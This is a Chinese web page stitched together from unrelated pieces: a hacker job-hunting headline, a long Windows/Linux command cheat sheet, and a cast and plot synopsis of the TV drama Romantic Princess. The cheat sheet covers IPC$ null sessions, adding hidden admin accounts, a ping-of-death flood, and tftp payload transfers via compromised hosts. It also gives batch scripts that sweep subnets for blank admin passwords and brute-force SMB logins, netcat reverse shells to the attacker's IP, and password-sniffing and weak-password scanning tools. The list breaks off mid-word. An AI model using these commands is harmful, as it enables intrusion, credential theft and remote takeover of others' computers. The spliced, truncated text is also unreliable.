超级黑客现场求职（26岁网络黑客上台求职要1000万）

我准备去应聘网吧网管,请问网管因该对DOS了解点什么`DOS我很少用过

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \\ip\c$ 登陆后映射对方C：到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

#2 二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见if命令及变量）

goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

#3 三：

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名 导出注册表

cacls 文件名 参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地网络配置情况

#4 四：

IIS服务命令：

iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）

iisreset /start或stop 启动（停止）所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。

FTP 命令： (后面有详细说明内容)

ftp的命令行格式为:

ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。

－d 使用调试方式。

－n 限制ftp的自动登录,即不使用.netrc文件。

－g 取消全局文件名。

help [命令] 或 ？[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote－dir 进入远程主机目录

cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

#5 五：

MYSQL 命令：

mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。

（例：mysql -h110.110.110.110 -Uroot -P123456

注:u与root可以不用加空格，其它也一样）

exit 退出MYSQL

mysqladmin -u用户名 -p旧密码 password 新密码 修改密码

grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）

show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。

use mysql；

show tables; 显示库中的数据表

describe 表名; 显示数据表的结构

create database 库名; 建库

use 库名；

create table 表名 (字段设定列表)； 建表

drop database 库名;

drop table 表名； 删库和删表

delete from 表名; 将表中记录清空

select * from 表名; 显示表中的记录

mysqldump --opt schoolschool.bbb 备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。

win2003系统下新增命令（实用部份）：

shutdown /参数 关闭或重启本地或远程主机。

参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。

例：shutdown /r /t 0 立即重启本地主机（无延时）

taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。

tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

#6 六：

Linux系统下基本命令： 要区分大小写

uname 显示版本信息（同win2K的 ver）

dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）

pwd 查询当前所在的目录位置

cd cd ..回到上一层目录，注意cd 与..之间有空格。cd /返回到根目录。

cat 文件名 查看文件内容

cat abc.txt 往abc.txt文件中写上内容。

more 文件名 以一页一页的方式显示一个文本文件。

cp 复制文件

mv 移动文件

rm 文件名 删除文件，rm -a 目录名删除目录及子目录

mkdir 目录名 建立目录

rmdir 删除子目录，目录内没有文档。

chmod 设定档案或目录的存取权限

grep 在档案中查找字符串

diff 档案文件比较

find 档案搜寻

date 现在的日期、时间

who 查询目前和你使用同一台机器的人以及Login时间地点

w 查询目前上机者的详细资料

whoami 查看自己的帐号名称

groups 查看某人的Group

passwd 更改密码

history 查看自己下过的命令

ps 显示进程状态

kill 停止某进程

gcc 黑客通常用它来编译C语言写的文件

su 权限转换为指定使用者

telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。

ftp ftp连接上某服务器（同win2K）

附：批处理命令与变量

1：for命令及变量 基本格式：

FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。

批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1 }

command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加： 来隔开

command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指执行command

参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到取完为止{ (set)为文件时，如(d:\pass.txt)时 }。

用法举例：

@echo off

echo 用法格式：test.bat *.*.* test.txt

for /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G /user:administrator | find "命令成功完成" test.txt

存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）； 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。

@echo off

echo 用法格式：ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

#7 七：

2：if命令及变量 基本格式：

IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。

例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。

0 指发现并成功执行（真）；1 指没有发现、没执行（假）。

IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。

例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）

IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。

例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。

IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用 括起来，因为del命令要单独一行时才能执行，用上 后就等于是单独一行了；例如：“if exist test.txt. del test.txt. else echo test.txt.missing ”，注意命令中的“.”

（二）系统外部命令(均需下载相关工具)：

1、瑞士军刀：nc.exe

参数说明：

-h 查看帮助信息

-d 后台模式

-e prog程序重定向，一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式，用于入站连接

-L 监听模式，连接天闭后仍然继续监听，直到CTR+C

-n IP地址，不能用域名

-o film记录16进制的传输

-p[空格]端口 本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出，用-vv将更详细

-w数字 timeout延时间隔

-z 将输入，输出关掉（用于扫锚时）

基本用法：

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用：nc -d -l -p 本机端口 要传送的文件路径及名称

在对方主机上用：nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件到对方主机

备 注：

| 管道命令

或 重定向命令。“”，例如：tlntadmn test.txt 指把test.txt的内容赋值给tlntadmn命令

＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

与的区别 ""指：覆盖；""指：保存到(添加到）。

如：@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别执行二次比较看：用的则是把二次的结果都保存了，而用：则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

#8 八：

2、扫锚工具：xscan.exe

基本格式

xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10

-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

#9 九：

3、命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-hos

参考资料：http://edu.zzlygo.com/lioulan/4917.html

好看的电视剧

我看过的你几乎都看过了,不过我觉得公主小妹很好看,有段时间很流行的,吴尊和张韶涵还有辰亦儒,不知道你喜不喜欢他们,真的很好看呢

中文名：《公主小妹》

英文名：《Romantic Princess》

别 名：《妹妹公主》、《姐妹公主》、《公主妹妹》、《我家公主》、《我爱公主小妹》

公主小妹电视台：台湾中视首播

内地首播时间：2008年8月2号起 每晚10点两集

上映： 2007年9月16日——12月9日

播放电视台：湖南卫视

集 数：13集(台湾) 21集（内地）

地 区：台湾

制作人：冯家瑞、齐锡麟、王信贵

编 剧：齐锡麟、可米编剧群

导 演：林合隆

演 员：

麦秋穗(皇甫珊,小麦)....张韶涵饰演

南风瑾....飞轮海 吴尊饰演

南风彩....飞轮海 辰亦儒饰演

皇甫雄 ....顾宝明饰演

南风璘....胡宇崴饰演

南风影....利昂霖饰演

伊森川....夏靖庭饰演

宫茉莉....卓文萱饰演

麦聪光....卜学亮饰演

麦戈卡哇....黄嘉千饰演

米若亚...贝贝饰

客串：毛征窈

【角色介绍】

南风瑾（吴尊 饰）

男，21岁，冷静沉稳，喜怒不形于色，外表看来似乎是一个冷血无情的富家公子，实际上却是一个温柔体贴、爱护弟弟的人。由于南风瑾看过太多上流社会嫌贫爱富、前倨后恭的虚假嘴脸，在人前总是显得很疏离，对每个人仿佛都隔着一层膜，也因此小麦单纯直接又澄澈明透的心思和个性格外吸引他的注意。

南风瑾的父母和小麦的亲生父母私交甚笃，四人在南风瑾八岁那一年死于同一场车祸。皇甫雄失去唯一的独生子之后，爱屋及乌地收养了南风瑾和南风璘两兄弟，更一心想培养南风瑾成为集团的接班人。南风瑾为了保护年幼天真的弟弟南风璘，同时也为了报答收养两兄弟的皇甫雄，总是毫无怨言地接受所有严苛的菁英训练，符合皇甫雄的期望，但是瑾心底深处却一直希望能够离开皇甫家庭这个光环，以自己真正的实力去找寻属于他的天空。瑾一直暗自计划著要脱离黄甫家的控制，然而他的计划却在爱上小麦之后全盘失控。

习惯设定：瑾常会坐在庭园中，遥望天际，有种笼中鸟的感觉，但是皇甫家这个铁笼实在太大，他怎么逃也逃不出去！

麦秋穗/皇甫珊（张韶涵 饰）

女，18岁，个性积极乐观，活力充沛，运动神经极佳，心地善良，温暖，吃软不吃硬，习惯保护弱小，因此在女校就读时常被同学视为“侠女”代表。小麦脾气倔强，一旦订立目标就要执行到底，有时候会有些小聪明，却常常聪明反被聪明误。

小麦从小在平凡的家庭中长大，也一直以为自己是父母的亲生女儿，谁想到她的真实身份竟然是皇甫集团董事长皇甫雄的孙女，原名：皇甫珊！小麦在爷爷皇甫雄的安排下住进了皇甫家大宅，然而她一方面无法习惯离开父母的生活，另一方面也对千金小姐充满拘束的生活感到十分不自在，因此三番两次想要逃离皇甫家。

小麦和瑾第一次见面，两人就爆发言语冲突，之后更因为连番错误而让两人的隔阂更大。小麦也一直认为瑾只是一个财大气粗又瞧不起人的富家子弟。直到一次偶然的机会里，小麦发现了瑾隐藏在冷酷外表下温柔体贴的一面，便在不知不觉中爱上了瑾，更全力想帮助瑾脱离皇甫家的控制。

习惯设定：小麦因为一直想帮养父母买一间大屋子，所以会习惯性的收集路边发散的房地产广告，对台北县市各个地段的房价了若指掌。

南风彩（辰亦儒 饰）

男，21岁，皇甫家族中有名的花花公子，看似浪荡不羁，不学无术。惟恐天下不乱，实际上能力不逊于瑾。 为了不想让皇甫集团这么庞大的责任落到自己头上，彩在人前人后总是装出一副败家子浪荡不羁的模样，直到后来才被小麦设计揭穿他伪装的假面具。 彩完全无意跟瑾竞争皇甫集团继承人的位置，只想轻轻松松悠闲的度日。然而最后欲因为爱上宫氏集团的独生女宫茉莉，而面临了同时要继承两大集团的天大难题。

习惯设定：彩其实不喜欢女生的香水味沾染到他身上，所以随身携带着一小瓶除臭剂，偏偏他换女伴的次数实在太频繁了，所以除臭剂常常不够用。

南风璘（胡宇崴饰）

男， 18岁，瑾的亲弟弟，因为长期在哥哥瑾的保护之下，个性单纯直接、天真烂漫，时常有些让人哭笑不得的短路行为出现。璘对小麦的好感源自於小麦亲生母亲留给他的童年记忆，虽然当年的璘年纪尚轻，却始终记得小麦母亲的笑容，因此，当璘第一眼见到小麦，便被小麦的笑容所深深吸引。

习惯设定:璘身边一直留着小麦生母当年送给他的布娃娃。那只布娃娃是依小麦小时候的样子做的，大腿根部跟小麦一样有一颗痣，腰部也有个心型胎记，璘平常还会当着小麦的面帮布娃娃换衣服，让小麦很受不了。

南风影(利昂霖 饰)

男， 18岁，彩的亲弟弟，看似害羞内向，实际上却有点小心机。因为身边出现的女人都是为了从他身上得到什么好处，所以他故意对外宣称他有“恐女症”，藉此阻挡那些不怀好意的女生接近他。影原本对小麦并无好感，也认为她只是另一个拜金女，然而亲眼目睹小麦对瑾的付出之后，南风影对小麦的印象完全改观。

宫茉莉（卓文萱 饰）

女，18岁，宫氏集团的千金小姐，因为从小出生于富裕家庭，难免有点千金小姐的娇气派头，但却拥有率直本性，对于感情十分执着。茉莉7岁时就对只见过一次面的南风彩一见钟情，但是因为当年的她只是个其貌不扬的丑小鸭，为了让自己能够配上南风彩，茉莉多年来不断磨练自己，耐心等待一个可以让南风彩对自己留下深刻印象的机会。

皇甫雄（顾宝明 饰）

男， 73 岁，皇甫集团的董事长，生性顽固，主控欲强，是个标准的「老狐狸」型人物，外表威严神武，难以亲近，实际上却有着十分孩子气、任性、贪玩的一面。自从独子皇甫海车祸过世之后，皇甫雄的内心一直是十分寂寞孤单的，因此当他寻回流落在外的孙女小麦时，他为了将小麦永远留在自己身边，不惜使出各种手段，反而造成小麦对他的抗拒和反弹。独子死后，皇甫雄为了培养日后接班的人选，将家族中最优秀的四个小辈 接入皇甫大宅中，施以菁英课程训练。在四名可能的接班人选之中，皇甫雄特别欣赏认真负责、表现杰出的瑾，更想尽各办法想撮合瑾和小麦在一起，没想到却造成反效果。

习惯设定:因为害怕再次失去所爱的亲人，皇甫雄常会突然在警卫室出现，跟警卫一起看监视画面，而把警卫吓了一大跳。

伊森川（夏靖庭 饰）

男， 50岁，日本人，皇甫雄的得力助手，个性谨慎、细心，善于察观颜色，讲话迂回婉转，深谙皇甫大宅的生存之道，所以只要一遇到他搞不定小麦的时候，他就会不动声色地把小麦推去给南风瑾处理。伊森川对皇甫大宅内的状况了如指掌，只要有任何状况都能第一时间赶到现场。他这种几乎随传随到、神出鬼没的功力让大宅内的人纷纷谣传伊森川其实是伊贺忍者的传人 。

麦聪光（卜学亮 饰）

男， 45 岁，小麦的养父。一般上班族，在皇甫集团的相关产业中担任低阶主管。个性老实顾家，不多话，在公司里常被欺负，莫名其妙背上黑锅。

麦戈卡哇（黄嘉千 饰）

女， 43 岁，小麦的养母，幼儿园老师，在皇甫集团附属的幼儿园工作。性格温柔有爱心，但有点迷糊，常常忘东忘西。超喜欢小孩，但是因为一场大病而无法再生育。小麦虽然不是她亲生的孩子，但是她却还是真心真意爱护她，视若己出。

米若亚/小米（贝贝 饰）

女， 18 岁，和小麦从小一起长大的死党。个性温柔害羞，喜欢做家事，手艺也一级棒。娇小可爱的小米从小就常被顽皮的男同学欺负，每次总是小麦出面替她主持正义。

【分集介绍】

第一集

十八岁的大一女学生麦秋穗，就跟一般平凡少女一样，从小就在一个气氛和乐的温暖家庭中长大，虽然家境并不是太富裕，住的也只是破旧的小公寓，但是小麦却觉得很幸福。

然而没想到，就在她要升上大一的暑假，发生了足以改变她一生的大事，竟然有一大票神秘的黑衣人出现在她家的小公寓中，宣称她真正的身份是国内首富皇甫集团董事长皇甫雄失踪多年的孙女，而麦父和麦母也承认小麦并非他们的亲生女儿，而是他们花钱向人口贩子买来的弃婴，这让小麦的际遇从人间升上了天堂。

但是就在小麦还在适应时，祖父皇甫雄就展现了他平时的强人强势作风，小麦因此被迫搬出麦家，住进皇甫大宅，然而，富家千金的生活却不如想象中美好，虽然零用金动不动就是上百万，但是自己却被迫跟生活了十八年原以为是自己亲生父母的麦父母分开。小麦住进皇甫大宅的第一天就因为被认定是居心叵测的拜金女，而和皇甫家公认最有可能接位的大少爷皇甫南风瑾结下梁子，两人不时针锋相对，水火不容。小麦原想找麦父母聊天，却发现麦父母因皇甫雄的要求，以ㄧ栋房子来换取不能再继续和小麦见面的条件，这点让小麦很伤心……

第二集

小麦原想找麦父母聊天，却发现麦父母因皇甫雄的要求，以ㄧ栋房子来换取不能再继续和小麦见面的条件，这点让小麦很伤心，但是碍于小麦希望麦父母能够生活无忧的情况下，小麦唯有想出一招，就是自己扛下房子的债务。

